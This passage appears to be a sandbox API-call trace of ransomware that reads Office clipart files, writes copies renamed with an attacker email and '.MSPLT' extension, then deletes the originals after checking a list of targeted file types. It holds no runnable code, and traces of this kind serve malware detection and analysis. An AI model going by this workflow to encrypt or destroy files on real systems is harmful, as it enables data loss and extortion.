liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0303.492] SetEndOfFile (hFile=0x4c0) returned 1 [0303.812] CloseHandle (hObject=0x4c0) returned 1 [0303.812] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00265_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0304.026] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00265_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00265_.wmf")) returned 1 [0304.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00265_.WMF") returned 68 [0304.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00265_.WMF") returned 68 [0304.032] lstrlenW (lpString=".doc") returned 4 [0304.032] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0304.032] lstrlenW (lpString=".docx") returned 5 [0304.032] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0304.032] lstrlenW (lpString=".pdf") returned 4 [0304.032] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0304.032] lstrlenW (lpString=".xls") returned 4 [0304.033] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0304.033] lstrlenW (lpString=".xlsx") returned 5 [0304.033] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0304.033] lstrlenW (lpString=".ppt") returned 4 [0304.033] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0304.033] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00265_.WMF") returned 68 [0304.033] lstrlenW (lpString=".zip") returned 4 [0304.033] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0304.033] lstrlenW (lpString=".rar") returned 4 [0304.033] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0304.033] lstrlenW (lpString=".bz2") returned 4 [0304.033] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0304.033] lstrlenW (lpString=".7z") returned 3 [0304.033] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0304.033] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00265_.WMF") returned 68 [0304.033] lstrlenW (lpString=".dbf") returned 4 [0304.033] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0304.033] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00265_.WMF") returned 68 [0304.033] lstrlenW (lpString=".1cd") returned 4 [0304.033] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0304.033] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00265_.WMF") returned 68 [0304.033] lstrlenW (lpString=".jpg") returned 4 [0304.033] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0304.033] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00265_.WMF") returned 68 [0304.033] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00265_.WMF") returned 68 [0304.033] lstrlenW (lpString=".doc") returned 4 [0304.033] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0304.034] lstrlenW (lpString=".docx") returned 5 [0304.034] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0304.034] lstrlenW (lpString=".pdf") returned 4 [0304.034] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0304.034] lstrlenW (lpString=".xls") returned 4 [0304.034] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0304.034] lstrlenW (lpString=".xlsx") returned 5 [0304.034] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0304.034] lstrlenW (lpString=".ppt") returned 4 [0304.034] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0304.034] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00265_.WMF") returned 68 [0304.034] lstrlenW (lpString=".zip") returned 4 [0304.034] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0304.034] lstrlenW (lpString=".rar") returned 4 [0304.034] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0304.034] lstrlenW (lpString=".bz2") returned 4 [0304.034] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0304.034] lstrlenW (lpString=".7z") returned 3 [0304.034] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0304.034] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00265_.WMF") returned 68 [0304.034] lstrlenW (lpString=".dbf") returned 4 [0304.034] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0304.034] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00265_.WMF") returned 68 [0304.034] lstrlenW (lpString=".1cd") returned 4 [0304.034] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0304.034] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00265_.WMF") returned 68 [0304.034] lstrlenW (lpString=".jpg") returned 4 [0304.034] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0304.035] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0304.035] lstrlenW (lpString="BL00274_.WMF") returned 12 [0304.035] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00274_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00274_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4e8 [0304.542] GetFileSizeEx (in: hFile=0x4e8, lpFileSize=0x2d4ff14 | out: lpFileSize=0x2d4ff14*=4164) returned 1 [0304.542] CloseHandle (hObject=0x4e8) returned 1 [0304.543] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00274_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00274_.wmf")) returned 0x220 [0304.874] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00274_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00274_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0305.134] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00274_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00274_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0305.485] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0305.485] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0305.485] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00274_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00274_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x520 [0306.199] GetLastError () returned 0x0 [0306.199] ReadFile (in: hFile=0x3e4, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x1044, lpOverlapped=0x0) returned 1 [0306.202] WriteFile (in: hFile=0x520, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0x1050, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0x1050, lpOverlapped=0x0) returned 1 [0306.204] ReadFile (in: hFile=0x3e4, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x0, lpOverlapped=0x0) returned 1 [0306.204] WriteFile (in: hFile=0x520, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0xec, lpOverlapped=0x0) returned 1 [0306.204] SetEndOfFile (hFile=0x520) returned 1 [0306.204] CloseHandle (hObject=0x520) returned 1 [0306.208] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0306.208] SetEndOfFile (hFile=0x3e4) returned 1 [0306.213] CloseHandle (hObject=0x3e4) returned 1 [0306.213] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00274_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0306.221] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00274_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00274_.wmf")) returned 1 [0306.223] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00274_.WMF") returned 68 [0306.223] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00274_.WMF") returned 68 [0306.223] lstrlenW (lpString=".doc") returned 4 [0306.223] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0306.223] lstrlenW (lpString=".docx") returned 5 [0306.223] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0306.223] lstrlenW (lpString=".pdf") returned 4 [0306.223] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0306.223] lstrlenW (lpString=".xls") returned 4 [0306.223] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0306.223] lstrlenW (lpString=".xlsx") returned 5 [0306.223] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0306.223] lstrlenW (lpString=".ppt") returned 4 [0306.223] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0306.223] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00274_.WMF") returned 68 [0306.223] lstrlenW (lpString=".zip") returned 4 [0306.224] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0306.224] lstrlenW (lpString=".rar") returned 4 [0306.224] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0306.224] lstrlenW (lpString=".bz2") returned 4 [0306.224] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0306.224] lstrlenW (lpString=".7z") returned 3 [0306.224] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0306.224] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00274_.WMF") returned 68 [0306.224] lstrlenW (lpString=".dbf") returned 4 [0306.224] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0306.224] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00274_.WMF") returned 68 [0306.225] lstrlenW (lpString=".1cd") returned 4 [0306.225] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0306.225] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00274_.WMF") returned 68 [0306.225] lstrlenW (lpString=".jpg") returned 4 [0306.225] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0306.225] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00274_.WMF") returned 68 [0306.225] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00274_.WMF") returned 68 [0306.225] lstrlenW (lpString=".doc") returned 4 [0306.225] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0306.225] lstrlenW (lpString=".docx") returned 5 [0306.225] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0306.225] lstrlenW (lpString=".pdf") returned 4 [0306.225] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0306.225] lstrlenW (lpString=".xls") returned 4 [0306.225] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0306.225] lstrlenW (lpString=".xlsx") returned 5 [0306.225] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0306.225] lstrlenW (lpString=".ppt") returned 4 [0306.225] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0306.225] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00274_.WMF") returned 68 [0306.225] lstrlenW (lpString=".zip") returned 4 [0306.226] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0306.226] lstrlenW (lpString=".rar") returned 4 [0306.226] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0306.226] lstrlenW (lpString=".bz2") returned 4 [0306.226] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0306.226] lstrlenW (lpString=".7z") returned 3 [0306.226] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0306.226] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00274_.WMF") returned 68 [0306.226] lstrlenW (lpString=".dbf") returned 4 [0306.226] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0306.226] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00274_.WMF") returned 68 [0306.226] lstrlenW (lpString=".1cd") returned 4 [0306.226] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0306.226] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00274_.WMF") returned 68 [0306.226] lstrlenW (lpString=".jpg") returned 4 [0306.226] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0306.226] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0306.226] lstrlenW (lpString="BL00524_.WMF") returned 12 [0306.227] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00524_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00524_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0306.229] GetFileSizeEx (in: hFile=0x3e4, lpFileSize=0x2d4ff14 | out: lpFileSize=0x2d4ff14*=6996) returned 1 [0306.229] CloseHandle (hObject=0x3e4) returned 1 [0306.229] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00524_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00524_.wmf")) returned 0x220 [0306.229] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00524_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00524_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0306.229] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00524_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00524_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0306.230] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0306.230] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0306.230] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00524_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00524_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x520 [0306.231] GetLastError () returned 0x0 [0306.231] ReadFile (in: hFile=0x3e4, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x1b54, lpOverlapped=0x0) returned 1 [0306.234] WriteFile (in: hFile=0x520, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0x1b60, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0x1b60, lpOverlapped=0x0) returned 1 [0306.236] ReadFile (in: hFile=0x3e4, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x0, lpOverlapped=0x0) returned 1 [0306.236] WriteFile (in: hFile=0x520, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0xec, lpOverlapped=0x0) returned 1 [0306.236] SetEndOfFile (hFile=0x520) returned 1 [0306.236] CloseHandle (hObject=0x520) returned 1 [0306.238] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0306.238] SetEndOfFile (hFile=0x3e4) returned 1 [0306.241] CloseHandle (hObject=0x3e4) returned 1 [0306.242] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00524_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0306.243] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00524_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00524_.wmf")) returned 1 [0306.244] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00524_.WMF") returned 68 [0306.244] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00524_.WMF") returned 68 [0306.244] lstrlenW (lpString=".doc") returned 4 [0306.244] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0306.244] lstrlenW (lpString=".docx") returned 5 [0306.244] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0306.244] lstrlenW (lpString=".pdf") returned 4 [0306.244] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0306.244] lstrlenW (lpString=".xls") returned 4 [0306.244] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0306.244] lstrlenW (lpString=".xlsx") returned 5 [0306.244] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0306.244] lstrlenW (lpString=".ppt") returned 4 [0306.244] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0306.244] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00524_.WMF") returned 68 [0306.244] lstrlenW (lpString=".zip") returned 4 [0306.244] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0306.244] lstrlenW (lpString=".rar") returned 4 [0306.244] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0306.244] lstrlenW (lpString=".bz2") returned 4 [0306.244] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0306.245] lstrlenW (lpString=".7z") returned 3 [0306.245] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0306.245] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00524_.WMF") returned 68 [0306.245] lstrlenW (lpString=".dbf") returned 4 [0306.245] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0306.245] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00524_.WMF") returned 68 [0306.245] lstrlenW (lpString=".1cd") returned 4 [0306.245] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0306.245] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00524_.WMF") returned 68 [0306.245] lstrlenW (lpString=".jpg") returned 4 [0306.245] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0306.245] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00524_.WMF") returned 68 [0306.245] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00524_.WMF") returned 68 [0306.245] lstrlenW (lpString=".doc") returned 4 [0306.245] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0306.246] lstrlenW (lpString=".docx") returned 5 [0306.246] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0306.246] lstrlenW (lpString=".pdf") returned 4 [0306.246] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0306.246] lstrlenW (lpString=".xls") returned 4 [0306.246] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0306.246] lstrlenW (lpString=".xlsx") returned 5 [0306.246] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0306.246] lstrlenW (lpString=".ppt") returned 4 [0306.246] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0306.246] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00524_.WMF") returned 68 [0306.246] lstrlenW (lpString=".zip") returned 4 [0306.246] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0306.246] lstrlenW (lpString=".rar") returned 4 [0306.246] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0306.246] lstrlenW (lpString=".bz2") returned 4 [0306.246] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0306.246] lstrlenW (lpString=".7z") returned 3 [0306.246] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0306.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00524_.WMF") returned 68 [0306.247] lstrlenW (lpString=".dbf") returned 4 [0306.247] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0306.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00524_.WMF") returned 68 [0306.247] lstrlenW (lpString=".1cd") returned 4 [0306.404] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0306.404] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00524_.WMF") returned 68 [0306.405] lstrlenW (lpString=".jpg") returned 4 [0306.405] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0306.405] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0306.405] lstrlenW (lpString="BL00525_.WMF") returned 12 [0306.405] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00525_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00525_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x528 [0306.722] GetFileSizeEx (in: hFile=0x528, lpFileSize=0x2d4ff14 | out: lpFileSize=0x2d4ff14*=9590) returned 1 [0306.722] CloseHandle (hObject=0x528) returned 1 [0306.723] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00525_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00525_.wmf")) returned 0x220 [0306.723] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00525_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00525_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0306.723] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00525_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00525_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x528 [0306.724] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0306.724] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0306.724] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00525_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00525_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x534 [0306.725] GetLastError () returned 0x0 [0306.725] ReadFile (in: hFile=0x528, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x2576, lpOverlapped=0x0) returned 1 [0306.745] WriteFile (in: hFile=0x534, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0x2580, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0x2580, lpOverlapped=0x0) returned 1 [0306.746] ReadFile (in: hFile=0x528, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x0, lpOverlapped=0x0) returned 1 [0306.746] WriteFile (in: hFile=0x534, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0xec, lpOverlapped=0x0) returned 1 [0306.746] SetEndOfFile (hFile=0x534) returned 1 [0306.751] CloseHandle (hObject=0x534) returned 1 [0306.756] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0306.756] SetEndOfFile (hFile=0x528) returned 1 [0306.761] CloseHandle (hObject=0x528) returned 1 [0306.761] SetFileAttributesW 